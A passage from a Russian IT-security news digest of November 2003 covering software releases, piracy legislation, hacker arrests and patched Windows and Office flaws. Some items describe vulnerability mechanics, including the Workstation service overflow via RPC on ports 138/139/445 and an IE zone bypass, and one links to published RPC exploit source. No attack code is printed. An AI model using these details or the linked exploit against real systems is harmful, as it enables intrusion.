Компания discreet, подразделение Autodesk, объявила о начале поставок 3ds max 6 – новой версии программного обеспечения для профессиональной трехмерной анимации и моделирования. Новая версия 3ds max обладает улучшенными инструментами моделирования, анимации и визуализации (в ее состав включены пакеты reactor 2 и mental ray 3.2), реализован новый схематический вид. Инструменты 3ds max 6 обеспечивают улучшенный ввод/вывод формата DWG (поддерживаются блоки AutoCAD 2004 и ObjectARX-компонент), поддержку HDRI. В поставку 3ds max 6 включен компакт-диск с ПО от стратегических партнеров Autodesk, таких как Criterion Software RenderWare Visualizer, Bionatics EASYnat, Okino Computer Graphics PolyTrans OpenFlight и ArchVision. Подробности - http://www.cnews.ru
14/11/2003 10:49 Ответственность за предрелизное пиратство ужесточится.
Сенат США рассмотрит законопроект, предусматривающий ужесточение уголовной ответственности лиц, незаконно копирующих фильмы и музыкальные альбомы и размещающих их в интернете до даты официального выхода. Предложенный сенаторами Джоном Корнином (штат Техас) и Дианой Файнстайн (Калифорния) проект Artists Rights and Theft Prevention (ART) Act (Акт о защите прав художников и предотвращении хищений) призван узаконить уголовное преследование пиратов, размещающих фильмы и музыку в онлайне до официального релиза. Звукозаписывающие компании и киноиндустрия уже давно бьют тревогу по поводу предрелизного пиратства, наносящего существенный урон их прибыли. Только в этом году такие кассовые фильмы, как "Халк" и "Матрица: Перезагрузка" попали во Всемирную паутину раньше, чем в кинотеатры. Совсем недавно рэперы Jay-Z и G-Unit вынуждены были перенести дату выхода своих альбомов, после того как их пиратские копии попали в интернет. Подробности - http://www.compulenta.ru/2003/11/13/42812/
14/11/2003 10:06 Американца оштрафовали на 2000 долларов за взлом веб-сайта "Аль-Джазиры".
Окружной суд города Лос-Анжелес приговорил к 1000 часов общественных работ и штрафу в 2000 долларов веб-дизайнера, во время войны в Ираке взломавшего сайт телеканала "Аль-Джазира", сообщает агентство Reuters. В результате действий 24-летнего Джона Вильяма Расина II (John William Racine), все посетители, желавшие попасть на веб-сайт спутникового канала, перенаправлялись на созданную хакером страницу, на которой был размещен флаг США и патриотический девиз. Как сообщили представители обвинения, руководство телеканала так и не сообщило им, стал ли поступок Расина причиной каких-либо финансовых потерь для канала. Подробности - http://www.lenta.ru
13/11/2003 23:28 Выполнение произвольного кода в Word и Excel
Согласно http://www.bugtraq.ru, уязвимость в Excel позволяет обойти систему проверки встроенных в файл макро-команд. Уязвимость в Word связана с проверкой длины фрагмента данных, содержащем имя макро-команды, и возможностью его переполнения. В обоих случаях специально подготовленный документ позволяет атакующему выполнить на машине жертвы произвольный код. Уязвимости подвержены версии начиная с '97, за исключением входящих в комплект Office 2003. Обновления доступны. Выпущен ббюллетень MS03-050. Подробности - http://www.microsoft.com/technet/...
13/11/2003 20:21 Удаленное переполнение буфера в службе Workstation в Microsoft Windows 2000/XP.
Уязвимость обнаружена в Workstation службе. Удаленный пользователь может выполнить произвольный код на уязвимой системе. Удаленный атакующий может послать специально сформированный пакет к службе Workstation, чтобы вызвать переполнение буфера и выполнить произвольный код на уязвимой системе с системными привилегиями. Уязвимость может эксплуатироваться через 138, 139, 445 порты. Переполнение буфера обнаружено в функции регистрации при генерации строк для лог файла, используя функцию vsprintf(). Имя лог файла - "NetSetup.LOG", он расположен в Windows "debug" каталоге. Обнаружено, что несколько RPC функций (часть из них недокументированны) принимают длинные строки в качестве параметров и записывают их в лог файл. Удаленный атакующий может представить чрезмерно длинный параметр к этим RPC функциям, чтобы вызвать переполнение стекового буфера в Workstation службе и выполнить произвольный код на уязвимой системе с SYSTEM привилегиями. M$ выпущен соответствующий бюллетень MS03-049 и патчи для уязвимых ОС (2К/ХР). Подробности - http://www.securitylab.ru/41207.html
13/11/2003 20:17 Обзор дистрибутива Fedora Core 1.
На OSNews помещён обзор дистрибутива Fedora Core 1, отмечается очень большое количество не доработок и ошибок в этом дистрибутиве. Обзор - http://www.osnews.com/story.php?news_id=5111
13/11/2003 19:14 Бразильская полиция арестовала банду хакеров.
Как сообщает Internet Report, бразильская полиция на днях провела успешную операцию, в ходе которой ей удалось задержать 18 хакеров, обезвредив, тем самым, банду компьютерных взломщиков, действовавших на территории четырех северных штатов этой страны. Рано утром полиция, вооружившись 33 ордерами на обыск (что само по себе уже говорит о масштабе операции) провела организованный арест интернет-мошенников. Операция под кодовым названием "Троянский конь", в ходе которой были задействованы 205 сотрудников полиции, специально разрабатывалась для нейтрализации преступной группы, членам которой в прошлом году удалось незаконно присвоить себе сумму, превышающую 10 млн. долларов США. Схема, по которой работали захваченные мошенники была довольно проста. На интернет-сайтах, создававшихся членами преступной группы, устанавливалось специальное программное обеспечение, которое позволяло злоумышленникам воровать реквизиты и пароли людей, осуществляющих денежные операции через эти сайты. После получения пароля деньги со счета жертвы переводились в другие банки, на счета третьих лиц. Источник - http://www.compulenta.ru
13/11/2003 18:10 Систему защиты для игротелефонов N-Gage взломали через месяц после начала продаж.
По сообщениям lenta.ru, ведущий мировой производитель мобильных телефонов Nokia в среду признал, что хакеры взломали защиту от копирования его новой разработки N-Gage - мобильного телефона имеющего возможности игровой приставки. Компания также выпускает игры для N-Gage, которые продаются отдельно на внешних носителях, и при их разработке Nokia предусмотрела защиту их от копирования, заявив, что даже если ее взломают, массовое пиратское копирование маловероятно, так как для этого необходимо специальное оборудование. Однако, как сообщает Reuters, взломавшие защиту пираты сделали игры для N-Gage доступными на любом мобильном устройстве, работающем под управлением ОС Series 60. В частности, к таковым относится модель Siemens's SX1. Подробности - http://story.news.yahoo.com/news?tmpl=story...
13/11/2003 16:49 Google проникает в IRC?
Внимание Google привлекли IRC каналы - в настоящее время исследуются способы их обслуживания. Это означает что Google в скором времени, возможно, оборетет способность искать информацию, содержащуюся на IRC-каналах. Услуги, типа Netsplit.de и Searсh IRC существуют давно, и оба сервиса позволяют получить информацию от различных IRC сетей. Google же пока лишь пробует себя в новом качестве, не внося революционных идей и технологий в эту сферу. Источник: http://news.proext.com/sec/
13/11/2003 16:43 "Интернетизация" Cobol
Фирма Micro Focus выпустила Net Express with . Net - инструментарий адаптации мэйнфреймовых приложений, написанных на Cobol, для работы с Web-службами, основанными на платформе Microsoft .Net. Система Micro Focus преобразует исходные тексты на OS/VC Cobol и Cobol 2 в код, распознаваемый платформой Microsoft Common Language Runtime. Инструментарий интегрируется со средой разработки Microsoft Visual Studio .Net, в которой перекомпилированный код можно отлаживать и тестировать. Net Express позволяет разрабатывать процедуры генерации и считывания XML-документов с использованием синтаксиса Cobol. Первая версия оптимизирована для систем пакетной обработки, в дальнейшем планируется реализовать поддержку и других видов приложений для мэйнфреймов. Micro Focus совместно с SCS и EDS будет оказывать пользователям Net Express помощь в переносе приложений - по словам представителя Micro Focus, полная автоматическая перекомпиляция невозможна - код придется дорабатывать вручную. Аналогичная технология у Micro Focus есть и для платформы J2EE. Источник: www.osp.ru
12/11/2003 12:19 Молодые американцы из любопытства взламывали сеть хозяйственного магазина.
10 ноября в окружном суде города Саутфилд (Southfield) состоялось первое заседание по делу 22-летнего Пола Тимминса (Paul Timmins) и 20-летнего Эдама Ботбила (Adam Botbyl), которых обвиняют в многократном несанкционированном проникновении в компьютерную сеть хозяйственных магазинов Lowe, сообщает Associated Press. По данным следствия, с 25 октября до 7 ноября Тимминс и Ботбил регулярно входили в корпоративную сеть Lowe, используя ноутбук и беспроводной интернет. Мотивы их действий пока остаются невыясненными. Основным пунктом обвинения против хакеров является нанесение ущерба защищенной компьютерной сети. Максимальное наказание за совершение этого преступления составляет 10 лишения свободы и штраф 250 тысяч долларов. Пол Тимминс сообщил суду, что является IT-специалистом в одной из компаний Саутфилда, работающих в сфере программного обеспечения. Ботбил является студентом технического колледжа. Оба обвиняемых были освобождены на время судебного слушания под залог в 10 тысяч долларов. Поводом для начала следствия по делу Тимминса и Ботбила стало заявление о незаконном проникновении в компьютер, установленный в главном офисе Lowe в Северной Каролине. Хакеры внесли ряд изменений в параметры установленных на компьютере программ и перехватили сведения о банковских транзакциях. Источник - http://www.kaspersky.ru
12/11/2003 11:55 SpamAssassin становится частью Apache-проекта.
SpamAssassin, кий является признанным лидером борьбы со спамом в мире открытых систем планируют включить в состав популярного Вэб-сервера Apache. Как предполагается, это позволит предотвратить отправку спама через Вэб-сервера. Подробности - http://news.spamassassin.org/modules.php?...
11/11/2003 17:11 Очередная статья по сборке связки Apache + php + perl + ssl.
Очередная статья из серии, описывающей процесс ( и облегчение) сборки Apache+PHP+Perl+SSL в ОС FreeBSD 5.1 опубликована на сайте OpenNet. Честно говоря, подобным статьям несть числа, но, как говорит автор (Сергей Куззнецов) описанный им способ сборки упрощён до того, что установить apach указаным методом требуется от силы 2 часа тупого наблюдения за монитором (если под ником SergeyKa в обсуждении выступает именно автор). Наверняка будет полезно для ознакомления начинающим СИСАДМИНам (продолжающим - это вряд ли будет интересно). Статья - http://www.opennet.ru/base/dev/apache_inst.txt.html
11/11/2003 14:26 ПО для безопасного VPN-доступа.
Компания Rainbow Technologies анонсировала версию 6.3 программного обеспечения Firebox SOHO 6, разработанного компанией WatchGuard. Данное семейство продуктов разработано специально для обеспечения безопасность проводных и беспроводных сетей предприятий малого бизнеса, удаленных офисов и мобильных пользователей. Firebox SOHO 6 Wireless позволяет Wi-Fi-пользователям совместно использовать VPN-доступ и ресурсы проводных сетей, например принтеры. При этом возможен обмен информацией между двумя точками беспроводного доступа для ситуаций, когда физическое соединение между ними слишком дорого. Для проводных сетей новые возможности устройств Firebox SOHO 6 предоставляют мобильным пользователям расширенную пропускную способность VPN за счет параллельного использования лицензий. Ожидается, что программное обеспечение версии 6.3 для Firebox SOHO 6 будет доступно уже в этом году. Зарегистрированные подписчики LiveSecurity Service смогут загрузить версию 6.3 с сайта www.watchguard.com бесплатно. Источник - http://www.osp.ru
11/11/2003 14:19 Сингапур вступил на путь превентивной борьбы с хакерами.
Власти Сингапура объявили об ужесточении законодательства в области борьбы с компьютерными преступлениями, сообщает агентство UPI. Теперь правоохранительные органы этого государства на законном основании смогут проводить превентивные мероприятия для нейтрализации хакеров. Изменения в законе "О неправильном использовании компьютеров" были одобрены законодательным собранием Сингапура. "Предоставляя благоприятный климат в области безопасности, этот закон значительно расширяет возможности наших ведомств в области киберугроз, особенно - в области кибертерроризма", - заявил министр внутренних дел Сингапура Хо Пенг Ки. Хо заверил парламентариев, что новый закон будет применяться исключительно в случае возникновения "неизбежной угрозы" для национальной безопасности. Источник - http://www.viruslist.com
11/11/2003 13:25 О героических буднях отдела "К".
На сайте oxpaha.ru опубликована статья, которая является перепечаткой статьи из газеты «Парламентская газета», 06.11.03 под оригинальным названием "Будни отдела "К". Господин Александр БЫКОВ, явлляющийся соб. корр-ом газеты по Краснодарскому краю рассказывает о деятельности регионального управления отдела "К", который, как известно, занимается расследованием преступлений в сфере высоких технологий. Статья - http://www.oxpaha.ru/view.asp?10567
11/11/2003 13:08 ФБР возьмет под колпак всех.
Генеральный Прокурор США выпустил новые правила, которых теперь будет придерживаться ФБР в своей деятельности. Согласно этим правилам ФБР обязано вести упреждающий сбор информации, которая может касаться угроз национальной безопасности США (по старым правилам у каждого расследования должна была быть определенная цель). В свете событий 11 сентября 2001 "антитеррористическая контрразведка" выглядит логичной, но в число топиков, подлежащих контролю наряду с терроризмом, шпионажем, саботажем и убийством политических деятелей включено также "иностранное компьютерное вторжение". Причем, речь идет не только о "прямой и явной угрозе" (атаке), но и о смежных действиях, неправомерность которых может быть зачастую сомнительна: "the use or attempted use of any cyber-activity or other means by, for, or on behalf of a foreign power to scan, probe, or gain unauthorized access into one or more U.S.-based computers." Так что теперь ездить в гости в США будет опасно не только разработчикам алгоритмов обхода защиты e-book, но и тем, кто по неосторожности посканил компьютер на территории США. Источник - http://www.bugtraq.ru
11/11/2003 12:20 Патчи для расширения возможностей сетевого стека FreeBSD.
Как сообщает linux.org.ru, Andre Oppermann представил на суд общественности набор патчей, расширяющих функциональность TCP/IP стека для операционной системы FreeBSD. Помимо улучшений были исправлены некоторые ошибки протокола TCP и добавлена защита от DoS-атак путём переполнения параметра MSS (Maximum Segment Size - максимальный размер передаваемого сегмента) Подробности - http://www.freebsdforums.org/forums/showthread.php?threadid=16031
11/11/2003 12:03 Sony Music изобрела еще один способ защиты музыкальных диск.
Звукозаписывающая компания Sony Music намерена представить новую технологию защиты музыкальних компакт-дисков от копирования, сообщает Reuters. В понедельник в Германии компания выпускает в продажу альбом группы Naturally Seven, на диске с которым применена новая технология защиты. На диске помимо традиционных музыкальных треков записаны также цифровые данные, которые включают в себя те же песни в сжатом компьютерном формате и программное обеспечение, позволяющее связываться по интернету с сайтом Sony Music для реализации различных дополнительных услуг. Музыкальные файлы, по утверждению разработчиков, могут быть скопированы с диска на компьютер, но проигрываться они будут только после того, как будут закачаны в какой-либо из плейеров производства компании Sony. Пока, как утверждается, их нельзя проиграть ни в одной компьютерной программе-проигрывателе музыкальных файлов. Это, по мнению компании, защитит лицензионную продукцию от попадания в файлообменные сети, в которых звукозаписывающая индустрия видит главную угрозу для своего бизнеса. Источник - http://www.lenta.ru
11/11/2003 10:58 Cтандартные коды GSM.
На сайте группы HCL опубликован документ, который, как нам кажется, может быть полезен владельцам сотовых телефонов (если не обращать внимание на орфографию автора ;)). Автор - Solloz. Бывают ситуации, когда ломается Ваш любимый мобильный телефон или в нём появляются глюки. И тогда нам не остаёётся ничего другого, как отнести свой мобильник в сервис-центр. Ну а там сидит добренький дядя, который поклацает по кнопкам Вашего мобильника (набрав ниже приведеные коды) и после этой трудной процедуры сдирает с Вас за это кругленькую суму. А если разобраться, то в этих кодах нет ничего сложного (орфография и пунктуация скорректирована мной - прим. newsmaker). Статья - http://hsl.h10.ru/text/security/s28.php
10/11/2003 18:03 Статья: «Системы DSL: quick review».
На сайте nixp.ru опубликована статья, автор которой, netracer, описывает основные виды DSL ((Digital Subscriber Line) — цифровая абонентская линия), а также их отличия друг от друга. Статья - http://www.nixp.ru/cgi-bin/go.pl?q=articles;a=dsl
10/11/2003 19:49 Использование двойного слеша для обхода зон безопасности IE.
Как сообщает bugtraq.ru, использование двойного слеша в URL вида [SysDrive]:\\Documents and Settings\[user_name]\Local Settings\Temporary Internet Files\Content.IE5, ссылающихся на файлы из локального кэша, приведет к тому, что данный файл будет загружен в контексте локальной системы - и, следовательно, даст выполнить на машине клиента произвольный код. Демонстрация доступна, патч - нет. Ждём-с очередной серии патчей от Microsoft, господа? Подробности - http://www.securityfocus.com/bid/8980/discussion/
10/11/2003 19:20 Red Hat представила новую операционную систему Fedora Core 1
Компания Red Hat объявила о первом релизе новой свободно распространяемой операционной системы проекта Fedora - Fedora Core 1. Проект Fedora и Fedora Core 1 - новая Linux-платформа, разработанная при поддержке Red Hat и сообщества разработчиков систем с открытым исходным кодом. Fedora Core 1 построена исключительно на бесплатном программном обеспечении. По словам Брайана Стивенса (Brian Stevens), руководителя проекта, Red Hat в первую очередь является проектом коммерческим, который обновляется приблизительно раз в год. Компания решила также принять участие в разработке бесплатного дистрибутива, и полгода назад был запущен проект Fedora. Red Hat планирует встраивать новые разработки из Fedora в свой Enterprise edition. В отличие от коммерческих дистрибутивов, Fedora Core 1 будет обновляться приблизительно каждые 4-6 месяцев, и каждый разработчик получит возможность работать со своим собственным проектом на этой платформе. По предположениям аналитиков, проект Fedora может помочь Red Hat исправить его репутацию в сообществе разработчиков, которая сложилась из-за того, что Red Hat использовал его разработки в своих проектах, но ничего не вносил взамен. Использование Fedora Core также разрешит для пользователей проблему с использованием дистрибутива Red Hat, редкость обновления которого лишала их возможности работать с новейшими разработками. Источник - http://www.cnews.ru
10/11/2003 19:07 Очередные обновления для Internet Explorer.
Корпорация Microsoft выпустила два обновления для браузера Internet Explorer 6 с установленным пакетом Service Pack 1. Они исправляют ошибки, которые приводят к "падению" браузера. Оба обновления рекомендуется устанавливать, только если ошибки действительно серьезно мешают работе с программой. В противном же случае, лучше подождать появления очередного сервис-пака для Internet Explorer. Первая из неприятностей связана со сбоями при отображении страниц в формате VML (Vector Markup Language). Если скрипт на странице меняет атрибут src-тэга, задающего VML-изображения, браузер может "упасть". Соответствующий патч уже выпущен, но пока требует дополнительного тестирования, поэтому пока его распространяют исключительно через службу поддержки Microsoft, по запросу пользователей. Второе обновление исправляет ошибку в DHTML-редакторе Internet Explorer. Ошибка иногда возникает, когда указатель находится в конце текста ссылки в DHTML-редакторе. В качестве временной меры в Microsoft советуют добавлять пробел после текста ссылки в поле Control DHTML-редактора. Устранить ошибку можно с помощью патча, который, впрочем, тоже будет подвергнут дополнительному тестированию и пока доступен только через службу технической поддержки Microsoft. Первое обновление - http://support.microsoft.com/default.aspx?kbid=826940 Второе - http://support.microsoft.com/default.aspx?kbid=827057
10/11/2003 18:30 Идея компьютера в компьютере обретает почву под ногами.
Софтверный гигант Microsoft и молодая компания VMware приблизили к реальности технологию для исполнения нескольких экземпляров операционной системы на одном компьютере. Так называемая виртуализация использует слой ПО, изолирующий программы от аппаратуры, на которой они работают. В ближайшее время Microsoft надеется воспользоваться этой идеей для поддержки заказчиков новых ПК, вынужденных работать со старыми программами. Но VMware пошла по этому пути дальше, постаравшись сделать свое ПО ядром популярной концепции «коммунальных вычислений», или метакомпьютинга (utility computing). В понедельник Microsoft объявит о завершении разработки новой версии Virtual PC для Windows. Программа Virtual PC 2004 будет доступна заказчикам оптовой лицензии Microsoft, а позднее в этом году — и розничным покупателям. В этот же день VMware планирует выпустить новое управляющее ПО VirtualCenter, о котором компания говорила в июле. VMware предлагает и комплект инструментов разработчика, при помощи которого такие компании, как IBM или НР, могут легко встроить VirtualCenter в свои системы коммунальных вычислений. Источник - http://www.zdnet.ru
10/11/2003 17:47 Бета-тестирование Антивируса Касперского® для Samba-серверов 5.0
"Лаборатория Касперского" сообщает о начале бета-тестирования Антивируса Касперского® для Samba-серверов 5.0. Компания приглашает всех желающих принять участие в программе внешнего тестирования продукта нового поколения, предназначенного для антивирусной защиты корпоративной сети. Антивирус Касперского для Samba-серверов 5.0 обеспечивает антивирусную проверку объектов на Samba-серверах, работающих под управлением операционных систем Linux, OpenBSD и FreeBSD. Продукт выполняет двухуровневое сканирование файловой системы сервера: как в масштабе реального времени (антивирусный монитор), так и по запросу (антивирусный сканер). В случае нахождения вредоносных программ продукт позволяет эффективно вылечить или блокировать зараженные объекты во избежание дальнейшего распространения эпидемии и оперативно уведомить системного администратора о произошедшем инциденте. Продукт также содержит автоматическую систему обновления антивирусной базы данных и создан на основе iChecker™ - интеллектуальной технологии сканирования файлов, которая позволяет увеличить скорость проверки до 3 раз. Подробности - http://www.kaspersky.ru/beta.html
10/11/2003 17:26 Министерство обороны Австралии признается в бессилии перед хакерами.
Компьютеры министерства обороны Австралии, как минимум, трижды оказывались открытыми для доступа хакеров. С таким заявлением выступил глава австралийского оборонного ведомства Роберт Хилл (Robert Hill), сообщает сайт газеты The Sydney Morning Herald. По его словам, в течение трех последних лет в системе компьютерной безопасности министерства были обнаружены три серьезных бреши. "Зафиксировано три случая обнаружения недостатков в системе внешней безопасности, которые позволяли получить несанкционированный доступ к сетям", - сообщил Хилл. Кроме того, с 2000 года в оборонном ведомстве отмечено 13 попыток несанкционированного доступа к информации со стороны персонала самого министерства обороны. В отношении пятерых сотрудников, уличенных в подобных попытках, по-прежнему ведется следствие. Анализ состояния электронной безопасности в структуре государственных ведомств Австралии выявил существование целой системы хищений данных. В числе пострадавших оказались также таможенная служба аэропорта Сиднея и министерство транспорта в Канберре, из помещений которых преступники вынесли компьютеры с секретными данными. Всего с 1998 года из государственных учреждений пропало более 1600 компьютеров. Наибольшее число пропаж приходится на министерство обороны - военные потеряли 300 единиц техники. При этом в двух случаях вместе с компьютерами пропали сведения под грифом "секретно". Источник - http://www.viruslist.ru
10/11/2003 17:02 Компьютерные вирусы празднуют юбилей.
Сегодня исполняется 20 лет термину «компьютерный вирус». Такое название для вредоносных программ было придумано в 1983 году американцем Фредом Коэном. Будучи студентом Университета Южной Калифорнии, он провел серию контролируемых экспериментов по созданию программы, способной к саморазмножению и распространению по сетям. Написанная Коэном программа-прототип применяла ту же тактику распространения, что и все нынешние вирусы. Она создавала свои копии и скрытно находила выходы для них в компьютерную сеть. Тогда еще не существовало интернета в его современном виде, поэтому нынешние вирусы используют иной код, но сам принцип был заложен 20 лет назад. Но, на самом деле, вовсе не Фред Коэн выпустил джинна из бутылки. Эта сомнительная честь принадлежит пакистанцам, братьям Амджад, которые открыли свой собственный компьютерный магазин, где торговали написанными ими программами. Они столкнулись с тем, что их программы незаконно копировались и распространялись. И тогда они написали первый код, небольшую программку под названием BRAIN, которую незаметно вставляли в свои произведения. Программа, активизировавшаяся при попытке копирования, стала реальным прообразом всего семейства вирусов, которые причиняют столько неприятностей сейчас. Впервые о возможности создания компьютерной программы, способной к размножению, заговорили еще в 1949 году, когда один из основателей теории компьютеров и вычислительной техники Джон фон Ньюманн написал статью под заглавием «Теория и организации сложных автоматов». Затем долгое время идея вредоносных программ пребывала в сфере математической теории и интересовала разве что писателей-фантастов, и только с широким распространением интернета опасность вирусов осознали специалисты и пользователи компьютеров. Источник - http://www.cnews.ru
9/11/2003 16:48 Microsoft финансирует SCO.
Американская Коммисия по ценным бумагам и биржам (SEC) разоблачила SCO Group, предъявившую $3-миллиардный иск к IBM. Стало известно, что корпорация Microsoft как минимум дважды инвестировала в SCO под видом оплаты лицензии на Unix, второй взнос составил $8 миллионов. James Governor, главный аналитик Red Monk, так прокомментировал известие: "Тот факт, что Microsoft финансирует подобную тяжбу со стороны владельца кода, совсем не удивителен. Microsoft понимает, о каких деньгах идет речь." Источник - www.nixp.ru. Подробности - http://www.vnunet.com/News/1147824
9/11/2003 15:49 В БиЛайне стал платным GPRS, а в Мегафоне – услуги девушек.
Тестирование БиЛайн-GPRS абонентами Би+ вступило в завершающую фазу. 10 ноября - на пять дней раньше объявленного срока – все «тестовые эксплуататоры» будут отключены от GPRS и для перехода на коммерческое потребление услуги ее придется еще раз подключить. У инженеров Вымпелкома было достаточно времени на выявление «узких мест», скоро мы увидим в какой мере удалось настроить и отладить сеть передачи данных. Для ранее подключенных абонентов (на контрактных тарифных планах) пере-подключаться не придется, но изменения в тарификации GPRS вступают в силу с 00:01 10 ноября – т.е. в ночь с 09 на 10 ноября. Подробности - http://www.mobile-review.com/articles/2003/bee-gprs-mega-girls.shtml
9/11/2003 15:36 Атака украинских хакеров на Royal Bank.
По информации Business.Scotsman.Com, 4 ноября украинскими хакерами была осуществленна атака на компьютерную систему платежей шотландского банка Royal Bank of Scotland Group (Великобритания). В результате атаки система платежей (WorldPay) была выведена из строя. Royal Bank of Scotland принимает меры, чтобы возобновить свою компьютерную систему розничных платежей. При помощи этой системы Royal Bank обслуживал в режиме WorldPay 27,000 клиентов и принимал платежи по пластиковым карточкам Visa, Mastercard, Diners и Mastercard в более чем 27 станах мира. Банк уже извинился перед клиентами, но еще не оценил всего ущерба от потерь в резултате этой хакерской атаки. По предварительной оценки экспертов, система вышла из строя от перегрузки серверов. Они были забросаны фальшивыми запросами с компьютеров, которые находятся в Украине. Организация и реализация такой атаки на Royal Bank of Scotland администрацией банка рассматривается как преднамеренная и немотивированная акция украинских хакеров. Руководство банка поспешило успокоить своих клиентов, среди которых такие известные компании, как Sony Music, Vodafone и Freeserve, о том, что хакеры не могли получить доступ к информации о них в базе данных. Расследованием этого преступления занимается Национальный центр по борьбе с преступностью в сфере высоких технологий (NHTCU) Источник - http://www.crime-research.ru
9/11/2003 15:12 Microsoft выпустила Windows Media Player 9 для Mac OS X.
Как сообщает на nixp.ru, после нескольких лет ожиданий корпорация Microsoft все-таки выпустила обновленную версию своего мультимедиа-проигрывателя Windows Media Player 9 для операционной системы Mac OS X. На русской версии сайта Microsoft написано про него следующее: «Разработан для версии 10.1 новой операционной системы Apple и обеспечивает поддержку передовых технологий Windows Media.» Также, что примечательно, на момент написания этой новости на русской страничке для скачивания WMP для Mac OS X обнаружена ошибка в VBScript-скрипте при просмотре под браузерами Netscape, Mozilla, Konqueror, Opera (Microsoft VBScript runtime error '800a000d'). Объём .bin-файла ~7 МБ. Скачать - тута
9/11/2003 14:27 Новый перевод на Russian Linux Gazette.
По сообщению lrn.ru, после продолжительного перерыва на сайте Russian Linux Gazette появился очередной перевод, который выполнен Андреем Киселёвым. Статья называется "Advanced Bash-Scripting Guide". По утверждению самого автора (Mendel Cooper)...данное руководство не предполагает наличие у читателя познаний в области программирования на языке сценариев, однако, быстро восполняет этот недостаток... Статья - http://gazette.linux.ru.net/rus/articles/index-abs-guide.html
8/11/2003 18:28 Эксплоит libc rpc.
Опубликован исходный код уязвимости в libc RPC. Как пишет сам автор, ins1der, при помощи этого эксплоита можно удалённо обойти механизм защиты памяти, применённый в таких продуктах, как OverflowGuard и StackDefender. Утверждается, что эксплоит способен атаковать ОС: Windows 2000 SP0 (english), Windows XP SP0 (english). Исходник - http://packetstorm.linuxsecurity.com/0311-exploits/rpc!exec.c
8/11/2003 18:06 Попытка внедрения трояна в Linux-ядро не удалась.
И ещё раз о попытке внесения закладки в ядро Linux. Как мы сообщали ранее, неизвестный попытался внедрить троян в код следующей версии Linux-ядра. В репозитарии с исходными кодами Linux kernel, известном как BitKeeper, были обнаружены сомнительные изменения за прошедшие 24 часа, из-за чего публичное хранилище сразу было закрыто, — сообщил ключевой разработчик. БД использовалась только для предоставления последней beta-версии Linux-ядра для пользователей CVS (Concurrent Versions System). Изменения, несущие собой уязвимость безопасности для ядра, никогда не станут частью Linux-кода, и до этого момента подобных случаев не наблюдалось, — сказал Larry McVoy, основатель компании BitMover и главный архитектор БД BitKeeper. Также он заверил, что BitKeeper надежно оборудован для отслеживания разного рода троянов. Об этом сообщил сайт nixp.ru. Источник - http://news.com.com
8/11/2003 17:41 ISPMail-HOWTO. v.2.0.
Как указал Rend с sysadmins.ru, Вышла новая версия уже знаменитого HOWTO: ISPMail-HOWTO. v.2.0. Данный текст описывает создание почтовой системы, использующей MySQL, Postfix/TLS, Cyrus-SASL, Courier-IMAP, Dr.Web, Apache, PHP и SquirrelMail. Автор документа - Вячеслав Калошин, он же "multik". Статья - http://www.multik.ru/linux/ispmailv2/
8/11/2003 17:29 Настройка ядра Linux при помощи sysctl.
На сайте samag.ru (он же Sys Admins Magazine) опубликована довольно интересная статья Dustin Puryear под оригинальным названием "Linux Kernel Tuning Using System Control". В статье описана сама процедура работы с инструментарием системных вызовов (sysctl), описаны различные полезные значения, которые можно прописать в системном файле /etc/sysctl.conf, который и анализируется sysctl. Работа с различными параметрами системных вызовов позволит в значительной степени настроить различные параметры ядра Linux, которые помогут оптимизировать и ускорить работу системы. Довольно полезная и познавательная информация для системных администраторов. Статья - http://www.samag.com/documents/s=8920/sam0311a/0311a.htm
8/11/2003 17:22 Очередной Top-10 уязвимостей UNIX-систем.
по сообщениям bugtraq.ru, SANS и ФБР обновили свой список наиболее часто используемых уязвимостей: 1. BIND; 2. RPC; 3. Apache; 4. Аккаунты без паролей или со слабыми паролями(старо, как мир); 5. Службы, передающие информацию открытым текстом (FTP, SMTP и т.п.); 6. Sendmail; 7. SNMP; 8. SSH; 9. Ошибки в конфигурации NIS/NFS; 10. SSL. Подробности - http://insight.zdnet.co.uk/business/management/0,39020490,39117586,00.htm
8/11/2003 16:17 Sony приложила палец к флэш-памяти.
Японский электронный гигант выпустил четыре запоминающих устройства, одно из которых оснащено дактилоскопической системой, позволяющей взамен идентификаторов и паролей для доступа к защищенным веб-сайтам использовать отпечатки пальцев. Все новые устройства основаны на технологии USB (universal serial bus). «Популярность USB-памяти стремительно растет, — говорится в заявлении Майкла Лукаса, директора Sony Electronics по потребительским и универсальным носителям. — В последний год спрос на них ежеквартально более чем удваивается». Устройство Sony Micro Vault with Fingerprint Access длиной с ключ и шириной с маркер вмещает 128 Мбайт данных и снабжено датчиком для считывания отпечатков пальцев. Оно может хранить информацию идентификаторов и паролей для нескольких веб-сайтов. Когда «ключ» подсоединен к ПК и пользователь обращается к одному из этих сайтов, он получает доступ, прикоснувшись к датчику. Кроме того, для защиты от несанкционированного доступа к компьютеру предусмотрен режим скринсейвера «Заблокировано». Устройство, как считает Sony, обеспечивает удобство и защиту, так что им могут заинтересоваться как конечные потребители, так и бизнес-пользователи. В США продукт поступит в продажу в ноябре по цене около 140 долл. Источник - http://www.zdnet.ru
7/11/2003 21:30 Microsoft опять прозевала один из своих доменов.
Как сообщает bugtraq.ru, на этот раз кто-то в компании банально забыл продлить домен hotmail.co.uk. Что забавно, в течение нескольких дней компания не реагировала на сообщения доброй души человека, зарегистрировавшего домен на себя и предлагавшего передать его обратно. В 99-м году аналогичная история произвошла с доменом passport.com, что на некоторое время парализовало работу Hotmail. Тогда домен был оплачен программистом Майклом Чейни, который передал его Microsoft, получив в качестве благодарности чек на 500$ (проданный позднее на благотворительно аукционе) и копию Visual Studio 6.0. Подробности - http://www.theregister.co.uk/content/6/33814.html
7/11/2003 20:27 Россия ужесточает борьбу с пиратством.
Порядка 80% российского аудио- и видеорынка представлено контрафактной продукцией. По данным Минпечати РФ, в минувшем году убытки государства в связи с недополучением налогов от нелегального аудио- и видеорынка составили более 3,5 млрд. рублей. Сложившая в России ситуация на аудио- и видеорынке требует принятия конкретных мер со стороны всех участников рынка: компаний грамзаписи - держателей прав на фонограммы, заводов-изготовителей тиражей этих фонограмм и дистрибьюторов, которые непосредственно продают продукцию. Президент РФ Владимир Путин выразил озабоченность в связи “с нерешенной пока проблемой в сфере борьбы с пиратством и защитой интеллектуальной собственности”. Эта тема обсуждалась на встрече президента России с руководством “Мосфильма” и ведущими российскими режиссерами 1 ноября. Заместитель министра внутренних дел Рашид Нургалиев доложил президенту России о принятых мерах в области борьбы с пиратской продукцией. Он сообщил, что за 9 месяцев 2003 года было проверено 70 тысяч предприятий, приостановлена незаконная деятельность 482 из них, возбуждено 2724 уголовных дел. Нургалиев заявил также, что к административной ответственности 